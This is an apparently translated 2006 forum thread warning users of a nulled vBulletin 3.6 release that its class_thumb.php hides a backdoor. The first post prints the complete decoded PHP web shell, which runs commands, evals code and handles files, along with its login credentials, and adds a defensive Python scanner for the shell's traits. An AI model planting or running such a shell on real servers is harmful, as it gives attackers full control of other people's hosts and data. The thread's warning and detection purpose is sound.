
vBulletin 3.6 Warning!!


kodoks
11-09-2006, 07:35 PM
Careful, those of you using the nulled version... from 2 releasers:
DGT - there's a backdoor in its validator.php!

SCRiPTMAFiA (I'm sad.. the owner of SCRiPTMAFiA is a good friend of mine on ProjectW /sob)
I got this info from a Russian forum and it has ALREADY been confirmed by my friend... he says it's a farewell gift (/swt) for his friends...

/includes/class_thumb.php
After decoding:
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.6.0 - Licence Number $sm_lickey
|| # ---------------------------------------------------------------- # ||
|| # Copyright c2000-2006 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # Регистрация | Регистрация # ||
|| #################################################################### ||
\*======================================================================*/

$version = "3.6.0";
$vsplit = "style=\"border-right: #000000 1px solid;\"";
$hsplit = "style=\"border-bottom: #000000 1px solid;\"";


$login='vb';
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")

if(!((@$_SERVER["PHP_AUTH_USER"]===$login)&&(sha1(@$_SERVER["PHP_AUTH_PW"])===$hash)))
{
header("WWW-Authenticate: Basic");
header("HTTP/1.0 401 Unauthorized");
die();
}

function cmd($s)
{ return `$s`;}
function safe_mode_is_on()
{ return !ereg("drmist", cmd("echo drmist"));}

function edit($size, $name, $val)
{ return "<input class=\"ed\" type=text size=$size name=$name value=\"$val\">"; }
function button($capt)
{ return "<input type=submit value=\"$capt\">"; }
function hidden($name, $val)
{ return "<input type=hidden name=$name value=\"$val\">"; }
function hidden_pwd()
{ global $location; return hidden("pwd",$location);}

if(version_compare(phpversion(),"4.1.0") == -1)
{ $_POST=&$HTTP_POST_VARS; }
if(@get_magic_quotes_gpc())
foreach ($_POST as $k=>$v)
{ $_POST[$k] = stripslashes($v); }

$action_edit = false;

$printline = "";

if(isset($_POST["action"])) $action = $_POST["action"];
else $action = "cmd";

if(isset($_POST["pwd"]))
{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }

$location = getcwd();

if(($action === "download")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(file_exists($fname))
{
$pathinfo = pathinfo($fname);
header("Content-Transfer-Encoding: binary");
header("Content-type: application/x-download");
header("Content-Length: ".filesize($fname));
header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
@readfile($fname);
die();
}
else
$printline = "\"$fname\" - download failed.";
}

echo "<head><style>input {border: black 1px solid; background-color:#cfcfcf; font: 8pt verdana;}
textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
td {padding:0} .ed{background-color: #dfdfdf;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none}
</style><title>vBulletin - Debug v$version</title></head><body><table width=100%>
<tr><td $hsplit><table><tr><td $vsplit><b>vB Debug v$version&nbsp;</b></td><td>id: ".cmd("id")."<br>uname: ".cmd("uname -a")."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
<tr><td colspan=2 $hsplit><center><form method=post>".hidden("action","save").hidden_pwd() ."<textarea cols=120 rows=16 wrap=off name=data>";

echo htmlspecialchars($printline)."\n";

if($action === "cmd")
{
if(isset($_POST["cmd"]))
$cmd = $_POST["cmd"];
else
$cmd = "ls -la";

$result = htmlspecialchars(cmd($cmd));

if($result === "")
$result = cmd("ls -la");

echo $result;
$location = getcwd();
}
elseif(($action === "edit")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
ob_start();

if(!@readfile($fname))
echo "Cann't open file \"$fname\".";
else
$action_edit = true;

$result = ob_get_clean();
@ob_end_clean();
echo htmlspecialchars($result);
}
elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
{
$fname = $_POST["fname"];
$data = $_POST["data"];
$fid = @fopen($fname, "w");
$fname = htmlspecialchars($fname);

if(!$fid)
echo "Cann't save file \"$fname\".";
else
{
fputs($fid, $data);
fclose($fid);
echo "File \"$fname\" is saved.";
}
}
elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(copy($_FILES["file"]["tmp_name"], $fname))
echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";
else
echo "Upload failed!";
}
elseif(($action === "eval")&&(isset($_POST["code"])))
{
$code = $_POST["code"];
ob_start();
@eval($code);
$result = ob_get_clean();
@ob_end_clean();
echo htmlspecialchars($result);
}

echo "</textarea>".(($action_edit) ? "<br>".button(" Save ").hidden("fname",$fname) : "")."</form></center></td></tr>
<tr><td $hsplit><center><form method=post>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></form></center></td></tr>
<tr><td $hsplit><center><form method=post>".hidden("action","edit").hidden_pwd() ."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button(" Edit ")."</td></table></form></center></td></tr>

<tr><td $hsplit><table width=100%><tr><td width=50% $vsplit>
<form method=post>".hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center></form>
</td><td width=50%>
<form method=post enctype=multipart/form-data>".hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input class=\"ed\" type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center></form>
</td></tr></table></td></tr>

<tr><td $hsplit><form method=post>".hidden("action","eval").hidden_pwd() ."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button(" Eval ")."</center></form></td></tr>
<tr><td align=right>Copyright &copy;2000 - 2006 Jelsoft Enterprises Limited. All rights reserved.</td></tr></table></body>";

/*======================================================================*\
|| ####################################################################
|| # Downloaded: $sm_time, $sm_date
|| # CVS: $RCSfile: attachment.php,v $ - $Revision: 1.176 $
|| ####################################################################
\*======================================================================*/
?>
Type Регистрация
Then input vb:qwerty and you can upload files to the host!

/swt /swt /swt
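As an added defensive example (not from the post, nor from any vBulletin or SCRiPTMAFiA release): a small Python scanner that looks for the traits of the decoded class_thumb.php above, i.e. backtick shell execution, an eval call, an HTTP Basic gate reading PHP_AUTH_USER/PHP_AUTH_PW, and a hardcoded 40-hex SHA-1 that it tries against a tiny wordlist. Both sample files and the wordlist are constructed for the demo.

```python
import hashlib
import re

# Constructed excerpt modelled on the decoded class_thumb.php quoted in the post; not the whole file.
BACKDOOR_SAMPLE = r'''<?php
$login='vb';
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
if(!((@$_SERVER["PHP_AUTH_USER"]===$login)&&(sha1(@$_SERVER["PHP_AUTH_PW"])===$hash)))
{ header("WWW-Authenticate: Basic"); die(); }
function cmd($s)
{ return `$s`;}
$code = $_POST["code"]; @eval($code);
?>'''

# Constructed benign file standing in for an ordinary thumbnail helper.
CLEAN_SAMPLE = r'''<?php
function fetch_thumb_size($w, $h, $max) { return array(min($w, $max), min($h, $max)); }
?>'''

# Indicators taken from the backdoor in the post. eval on its own is weak evidence
# (vBulletin's template engine uses eval), so the verdict requires two or more hits.
INDICATORS = {
    "backtick_shell_exec": re.compile(r"`\s*\$\w+\s*`"),
    "eval_call": re.compile(r"@?eval\s*\("),
    "basic_auth_gate": re.compile(r'\$_SERVER\["PHP_AUTH_(USER|PW)"\]'),
    "hardcoded_sha1": re.compile(r"['\"]([0-9a-f]{40})['\"]"),
}

# Tiny constructed wordlist for recovering a hardcoded gate password.
WORDLIST = ("password", "qwerty", "123456", "admin")

def scan_php(source):
    """Return (hits, flagged) for one PHP source string.

    hits maps indicator name -> matched text. A 40-hex constant is also compared
    with sha1() of each wordlist entry; a match is reported as 'weak_gate_password'.
    flagged is True when at least two indicators fire.
    """
    hits = {}
    for name, rx in INDICATORS.items():
        m = rx.search(source)
        if m:
            hits[name] = m.group(0)
    if "hardcoded_sha1" in hits:
        digest = hits["hardcoded_sha1"].strip("'\"")
        for word in WORDLIST:
            if hashlib.sha1(word.encode()).hexdigest() == digest:
                hits["weak_gate_password"] = word
                break
    return hits, len(hits) >= 2

if __name__ == "__main__":
    for label, src in (("backdoor", BACKDOOR_SAMPLE), ("clean", CLEAN_SAMPLE)):
        hits, flagged = scan_php(src)
        print(label, "FLAGGED" if flagged else "ok", sorted(hits))
```

Running it over a real install means feeding every .php under the web root through scan_php and reviewing the flagged files by hand; a nulled package's own files are the first place to look.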

Th0R
11-09-2006, 08:09 PM
Turns out I was right again ..
Damn it ..
Publish it ..
Gyahahahahaha ..

If you've noticed, lots of websites have been down since yesterday ..
Hacked by Turkish people .. And all of them are vBulletin 3.6 users (even the paid version) ..
Why?!
Well .. There's an exploit that works on the Nulled and Paid versions of vBulletin 3.6 ..

What's the exploit?
Seems like the one for the paid version hasn't been released yet??
So .. Let it be .. xD~~
Maybe next time it'll get released .. Hahaha

Thanks.
Th0R

kodoks
12-09-2006, 07:00 PM
Turns out I was right again ..
Damn it ..
Publish it ..
Gyahahahahaha ..

If you've noticed, lots of websites have been down since yesterday ..
Hacked by Turkish people .. And all of them are vBulletin 3.6 users (even the paid version) ..
Why?!
Well .. There's an exploit that works on the Nulled and Paid versions of vBulletin 3.6 ..

What's the exploit?
Seems like the one for the paid version hasn't been released yet??
So .. Let it be .. xD~~
Maybe next time it'll get released .. Hahaha

Thanks.
Th0R
ekekeke....... honestly, I only just found out... /swt after some random IP started messing around on my forum /swt

rha
16-09-2006, 10:49 PM
The rebuttal is here:

SCRiPTMAFiA 3.6 gold WARNING!!!
http://www.projectw.org/viewtopic.php?t=316166&highlight=vbulletin&sid=2dbcf6aaed65cd3bb4f35c639b9023e3

btw, where's vB 3.6.1? Nobody has posted it yet. ;))

kodoks
17-09-2006, 08:21 AM
The rebuttal is here:

SCRiPTMAFiA 3.6 gold WARNING!!!
http://www.projectw.org/viewtopic.php?t=316166&highlight=vbulletin&sid=2dbcf6aaed65cd3bb4f35c639b9023e3

btw, where's vB 3.6.1? Nobody has posted it yet. ;))
wew, a PW member too.. nice to meet you, boss... /kis /kis